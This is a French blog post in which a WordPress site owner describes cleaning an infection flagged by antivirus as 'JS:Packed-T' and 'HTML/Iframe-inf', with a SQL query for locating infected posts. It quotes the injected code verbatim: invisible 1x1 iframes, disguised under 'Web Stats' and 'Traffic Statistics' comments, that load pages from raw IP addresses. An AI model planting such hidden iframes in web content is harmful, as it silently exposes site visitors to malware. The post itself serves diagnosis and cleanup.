Cheval de troie JS:Packed-T [trj] et malware ‘HTML/Iframe-inf’

Cheval de Troie

Cheval de Troie

J’ai un site qui a été infecté par ce couple d’emmerdement juste avant le WE du premier Mai.

Le symptôme :

Les anti-virus de vos visiteurs vont se mettre à clignoter avec des messages citant ces 2 coupables :

  • Cheval de troie JS:Packed-T [trj]
  • Programme malveillant  ‘HTML/Iframe-inf’

Il me semble que ces 2 problèmes ont une seule solution.

J’ai trouvé ceci dans le code source de la page infestée :

<!-- Web Stats -->
<iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe>
<!-- End Web Stats -->

D’après Field Marshall il s’agit simplement d’une ligne de texte qui s’est introduite à la fin des fichiers index.php. Field Marshall indique des méthodes basées sur des scripts à lancer sur une console pour chasser et éradiquer le problème.

De mon coté, cela me rappelle quelque chose et j’ai déjà été victime d’un troyen. C’était wp-stat et ça ressemble beaucoup à JS:Packed. Je vous recommande la lecture de cet article d’ailleurs.

J’ai commencé par éradiquer la chaine contenant le terme « iframe » avec une recherche dans les sources des derniers articles publiés.

Pour vérifier dans la base de données, on peut se loguer avec PhpMyAdmin et lancer la requête suivante :

SELECT * FROM wptuto_posts WHERE post_content like '%IFRAME%' ;

Attention, maintenant que WordPress archive les articles, vous pouvez encore trouver des trace de la ligne dans des version archivées des articles nettoyés (post-type = revision).

Parmis les articles incriminées j’ai trouvé ce code :

<!-- Traffic Statistics --> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

Et aussi celui là :

<!-- Web Stats --> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->

Pour ce soir, je vais en rester là. J’imagine que ce sont des postes de rédacteurs qui sont infestés et qui ont permis l’intrusion de ces codes.


Tags : , ,
Trackbacks Commentaires
1 2
Réagissez